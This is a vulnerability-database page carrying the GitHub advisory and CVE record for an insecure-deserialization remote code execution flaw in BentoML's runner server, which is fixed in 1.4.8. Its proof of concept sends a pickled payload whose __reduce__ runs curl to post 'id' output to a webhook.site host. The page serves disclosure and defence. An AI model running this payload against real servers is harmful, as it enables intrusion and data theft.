github - ghsa-7v4r-c989-xh26

ghsa-7v4r-c989-xh26

Vulnerability from github

Published

2025-04-09 12:59

Modified

2025-04-23 15:24

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

BentoML's runner server Vulnerable to Remote Code Execution (RCE) via Insecure Deserialization

Details

Summary

There was an insecure deserialization in BentoML's runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server.

PoC

First, create a file named model.py to create a simple model and save it ``` import bentoml import numpy as np

class mymodel: def predict(self, info): return np.abs(info) def call(self, info): return self.predict(info)

model = mymodel() bentoml.picklable_model.save_model("mymodel", model) - Then run the following command to save this model python3 model.py - Next, create **bentofile.yaml** to build this model service: "service.py"
description: "A model serving service with BentoML"
python: packages: - bentoml - numpy models: - tag: MyModel:latest
include: - "*.py"
- Then, create **service.py** to host this model import bentoml from bentoml.io import NumpyNdarray import numpy as np

model_runner = bentoml.picklable_model.get("mymodel:latest").to_runner()

svc = bentoml.Service("myservice", runners=[model_runner])

async def predict(input_data: np.ndarray):

input_columns = np.split(input_data, input_data.shape[1], axis=1)
result_generator = model_runner.async_run(input_columns, is_stream=True)
async for result in result_generator:
    yield result

- Then, run the following commands to build and host this model bentoml build bentoml start-runner-server --runner-name mymodel --working-dir . --host 0.0.0.0 --port 8888 - Finally, run this below python script to exploit insecure deserialization vulnerability in BentoML's runner server. import requests import pickle

url = "http://0.0.0.0:8888/"

headers = { "args-number": "1", "Content-Type": "application/vnd.bentoml.pickled", "Payload-Container": "NdarrayContainer", "Payload-Meta": '{"format": "default"}', "Batch-Size": "-1", }

class P: def reduce(self): return (import('os').system, ('curl -X POST -d "$(id)" https://webhook.site/61093bfe-a006-4e9e-93e4-e201eabbb2c3',))

response = requests.post(url, headers=headers, data=pickle.dumps(P()))

print(response) ``` And I can replace the NdarrayContainer with PandasDataFrameContainer in Payload-Container header and the exploit still working. After running exploit.py then the output of the command id will be send out to the WebHook server.

Root Cause Analysis:

When handling a request in BentoML runner server in src/bentoml/_internal/server/runner_app.py, when the request header args-number is equal to 1, it will call the function _deserialize_single_param like the code below: ``` https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L291-L298 async def _request_handler(request: Request) -> Response: assert self._is_ready

arg_num = int(request.headers["args-number"]) r_: bytes = await request.body()

if arg_num == 1: params: Params[t.Any] = deserialize_single_param(request, r) - Then this is the function of `_deserialize_single_param`, which will take the value of all request headers of `Payload-Container`, `Payload-Meta` and `Batch-Size` and the crafted into `Payload` class which will contain the data from `request.body` https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L376-L393 def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]: container = request.headers["Payload-Container"] meta = json.loads(request.headers["Payload-Meta"]) batch_size = int(request.headers["Batch-Size"]) kwarg_name = request.headers.get("Kwarg-Name") payload = Payload( data=bs, meta=meta, batch_size=batch_size, container=container, ) if kwarg_name: d = {kwarg_name: payload} params: Params[t.Any] = Params(**d) else: params: Params[t.Any] = Params(payload)

return params - After crafting `Params` containing payload, it will call to function `infer` with `params` variable as input https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L303-L304 try: payload = await infer(params) - Inside function `infer`, the `params` variable with is belong to class `Params` will call the function `map` of that class with `AutoContainer.from_payload` as a parameter. https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L278-L289 async def infer(params: Params[t.Any]) -> Payload: params = params.map(AutoContainer.from_payload)

try: ret = await runner_method.async_run( params.args, *params.kwargs ) except Exception: traceback.print_exc() raise

return AutoContainer.to_payload(ret, 0) - Inside class `Params` define the function `map` which will call the `AutoContainer.from_payload` function with arguments, which are `data`, `meta`, `batch_size` and `container` https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/utils.py#L59-L66 def map(self, function: t.Callable[[T], To]) -> Params[To]: """ Apply a function to all the values in the Params and return a Params of the return values. """ args = tuple(function(a) for a in self.args) kwargs = {k: function(v) for k, v in self.kwargs.items()} return ParamsTo - Inside class `AutoContainer` class have defined the function `from_payload` which will find the class by the `payload.container` , which is the value of header `Payload-Container`, and it will call the function `from_payload` from the chosen class as return value https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L710-L712 def from_payload(cls, payload: Payload) -> t.Any: container_cls = DataContainerRegistry.find_by_name(payload.container) return container_cls.from_payload(payload) And if the attacker set value of header `Payload-Container` to `NdarrayContainer` or `PandasDataFrameContainer`, it will call `from_payload` and when it then check if the `payload.meta["format"] == "default"` it will call `pickle.loads(payload.data)` and `payload.meta["format"]` is the value of header `Payload-Meta` and the attacker can set it to `{"format": "default"}` and `payload.data` is the value of `request.body` which is the payload from malicious `class P` in my request, which will trigger `__reduce__` method and then execute arbitrary commands (for my example is the `curl` command) https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L411-L416 def from_payload( cls, payload: Payload, ) -> ext.PdDataFrame: if payload.meta["format"] == "default": return pickle.loads(payload.data) https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L306-L312 def from_payload( cls, payload: Payload, ) -> ext.NpNDArray: format = payload.meta.get("format", "default") if format == "default": return pickle.loads(payload.data) ```

Impact

In the above Proof of Concept, I have shown how the attacker can execute command id and send the output of the command to the outside. By replacing id command with any OS commands, this insecure deserialization in BentoML's runner server will grant the attacker the permission to gain the remote shell on the server and injecting backdoors to persist access.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "bentoml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0a1"
            },
            {
              "fixed": "1.4.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-32375"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-09T12:59:45Z",
    "nvd_published_at": "2025-04-09T16:15:25Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nThere was an insecure deserialization in BentoML\u0027s runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server.\n\n### PoC\n - First, create a file named **model.py** to create a simple model and save it\n```\nimport bentoml\nimport numpy as np\n\nclass mymodel:\n    def predict(self, info):\n        return np.abs(info)\n    def __call__(self, info):\n        return self.predict(info)\n\nmodel = mymodel()\nbentoml.picklable_model.save_model(\"mymodel\", model)\n```\n- Then run the following command to save this model\n```\npython3 model.py\n```\n- Next, create **bentofile.yaml** to build this model\n```\nservice: \"service.py\"  \ndescription: \"A model serving service with BentoML\"  \npython:\n  packages:\n    - bentoml\n    - numpy\nmodels:\n  - tag: MyModel:latest  \ninclude:\n  - \"*.py\"  \n```\n- Then, create **service.py** to host this model\n```\nimport bentoml\nfrom bentoml.io import NumpyNdarray\nimport numpy as np\n\n\nmodel_runner = bentoml.picklable_model.get(\"mymodel:latest\").to_runner()\n\nsvc = bentoml.Service(\"myservice\", runners=[model_runner])\n\nasync def predict(input_data: np.ndarray):\n\n    input_columns = np.split(input_data, input_data.shape[1], axis=1)\n    result_generator = model_runner.async_run(input_columns, is_stream=True)\n    async for result in result_generator:\n        yield result\n```\n- Then, run the following commands to build and host this model\n```\nbentoml build\nbentoml start-runner-server --runner-name mymodel --working-dir . --host 0.0.0.0 --port 8888\n```\n- Finally, run this below python script to exploit insecure deserialization vulnerability in BentoML\u0027s runner server.\n```\nimport requests\nimport pickle\n\nurl = \"http://0.0.0.0:8888/\"\n\nheaders = {\n    \"args-number\": \"1\",\n    \"Content-Type\": \"application/vnd.bentoml.pickled\",\n    \"Payload-Container\": \"NdarrayContainer\", \n    \"Payload-Meta\": \u0027{\"format\": \"default\"}\u0027,\n    \"Batch-Size\": \"-1\",\n}\n\nclass P:\n    def __reduce__(self):\n        return  (__import__(\u0027os\u0027).system, (\u0027curl -X POST -d \"$(id)\" https://webhook.site/61093bfe-a006-4e9e-93e4-e201eabbb2c3\u0027,))\n\nresponse = requests.post(url, headers=headers, data=pickle.dumps(P()))\n\nprint(response)\n```\nAnd I can replace the **NdarrayContainer** with **PandasDataFrameContainer** in **Payload-Container** header and the exploit still working.\nAfter running **exploit.py** then the output of the command **id** will be send out to the WebHook server.\n\n### Root Cause Analysis:\n\n- When handling a request in BentoML runner server in `src/bentoml/_internal/server/runner_app.py`, when the request header `args-number` is equal to 1, it will call the function `_deserialize_single_param` like the code below:\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L291-L298\nasync def _request_handler(request: Request) -\u003e Response:\n    assert self._is_ready\n\n    arg_num = int(request.headers[\"args-number\"])\n    r_: bytes = await request.body()\n\n    if arg_num == 1:\n        params: Params[t.Any] = _deserialize_single_param(request, r_)\n```\n- Then this is the function of `_deserialize_single_param`, which will take the value of all request headers of `Payload-Container`, `Payload-Meta` and `Batch-Size` and the crafted into `Payload` class which will contain the data from `request.body`\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L376-L393\ndef _deserialize_single_param(request: Request, bs: bytes) -\u003e Params[t.Any]:\n    container = request.headers[\"Payload-Container\"]\n    meta = json.loads(request.headers[\"Payload-Meta\"])\n    batch_size = int(request.headers[\"Batch-Size\"])\n    kwarg_name = request.headers.get(\"Kwarg-Name\")\n    payload = Payload(\n        data=bs,\n        meta=meta,\n        batch_size=batch_size,\n        container=container,\n    )\n    if kwarg_name:\n        d = {kwarg_name: payload}\n        params: Params[t.Any] = Params(**d)\n    else:\n        params: Params[t.Any] = Params(payload)\n\n    return params\n```\n- After crafting `Params` containing payload, it will call to function `infer` with `params` variable as input\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L303-L304\ntry:\n  payload = await infer(params)\n```\n- Inside function `infer`, the `params` variable with is belong to class `Params` will call the function `map` of that class with `AutoContainer.from_payload` as a parameter.\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L278-L289\nasync def infer(params: Params[t.Any]) -\u003e Payload:\n      params = params.map(AutoContainer.from_payload)\n\n      try:\n          ret = await runner_method.async_run(\n              *params.args, **params.kwargs\n          )\n      except Exception:\n          traceback.print_exc()\n          raise\n\n      return AutoContainer.to_payload(ret, 0)\n```\n- Inside class `Params` define the function `map` which will call the `AutoContainer.from_payload` function with arguments, which are `data`, `meta`, `batch_size` and `container`\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/utils.py#L59-L66\ndef map(self, function: t.Callable[[T], To]) -\u003e Params[To]:\n    \"\"\"\n    Apply a function to all the values in the Params and return a Params of the\n    return values.\n    \"\"\"\n    args = tuple(function(a) for a in self.args)\n    kwargs = {k: function(v) for k, v in self.kwargs.items()}\n    return Params[To](*args, **kwargs)\n```\n- Inside class `AutoContainer` class have defined the function `from_payload` which will find the class by the `payload.container` , which is the value of header `Payload-Container`, and it will call the function `from_payload` from the chosen class as return value\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L710-L712\ndef from_payload(cls, payload: Payload) -\u003e t.Any:\n    container_cls = DataContainerRegistry.find_by_name(payload.container)\n    return container_cls.from_payload(payload)\n```\nAnd if the attacker set value of header `Payload-Container` to `NdarrayContainer` or `PandasDataFrameContainer`, it will call `from_payload` and when it then check if the `payload.meta[\"format\"] == \"default\"` it will call `pickle.loads(payload.data)` and `payload.meta[\"format\"]` is the value of header `Payload-Meta` and the attacker can set it to `{\"format\": \"default\"}` and `payload.data` is the value of `request.body` which is the payload from malicious `class P` in my request, which will trigger `__reduce__` method and then execute arbitrary commands (for my example is the `curl` command)\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L411-L416\ndef from_payload(\n    cls,\n    payload: Payload,\n) -\u003e ext.PdDataFrame:\n    if payload.meta[\"format\"] == \"default\":\n        return pickle.loads(payload.data)\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L306-L312\ndef from_payload(\n    cls,\n    payload: Payload,\n) -\u003e ext.NpNDArray:\n    format = payload.meta.get(\"format\", \"default\")\n    if format == \"default\":\n        return pickle.loads(payload.data)\n```\n### Impact\nIn the above Proof of Concept, I have shown how the attacker can execute command **id** and send the output of the command to the outside. By replacing **id** command with any OS commands, this insecure deserialization in BentoML\u0027s runner server will grant the attacker the permission to gain the remote shell on the server and injecting backdoors to persist access.",
  "id": "GHSA-7v4r-c989-xh26",
  "modified": "2025-04-23T15:24:05Z",
  "published": "2025-04-09T12:59:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32375"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bentoml/BentoML"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/bentoml/PYSEC-2025-32.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "BentoML\u0027s runner server Vulnerable to Remote Code Execution (RCE) via Insecure Deserialization"
}

cve-2025-32375

Vulnerability from cvelistv5

Published

2025-04-09 15:30

Modified

2025-04-09 15:40

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

Insecure Deserialization leads to RCE in BentoML's runner server

References

▼	URL	Tags
	https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26	x_refsource_CONFIRM

Impacted products

▼	Vendor	Product
	bentoml	BentoML

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-32375",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-09T15:40:47.551113Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-09T15:40:52.656Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "BentoML",
          "vendor": "bentoml",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.0, \u003c 1.4.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.8, there was an insecure deserialization in BentoML\u0027s runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server. This vulnerability is fixed in 1.4.8."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-04-09T15:30:03.842Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26"
        }
      ],
      "source": {
        "advisory": "GHSA-7v4r-c989-xh26",
        "discovery": "UNKNOWN"
      },
      "title": "Insecure Deserialization leads to RCE in BentoML\u0027s runner server"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-32375",
    "datePublished": "2025-04-09T15:30:03.842Z",
    "dateReserved": "2025-04-06T19:46:02.461Z",
    "dateUpdated": "2025-04-09T15:40:52.656Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

Action not permitted

ghsa-7v4r-c989-xh26

Vulnerability from github

Summary

PoC

Root Cause Analysis:

Impact

cve-2025-32375

Vulnerability from cvelistv5

Tags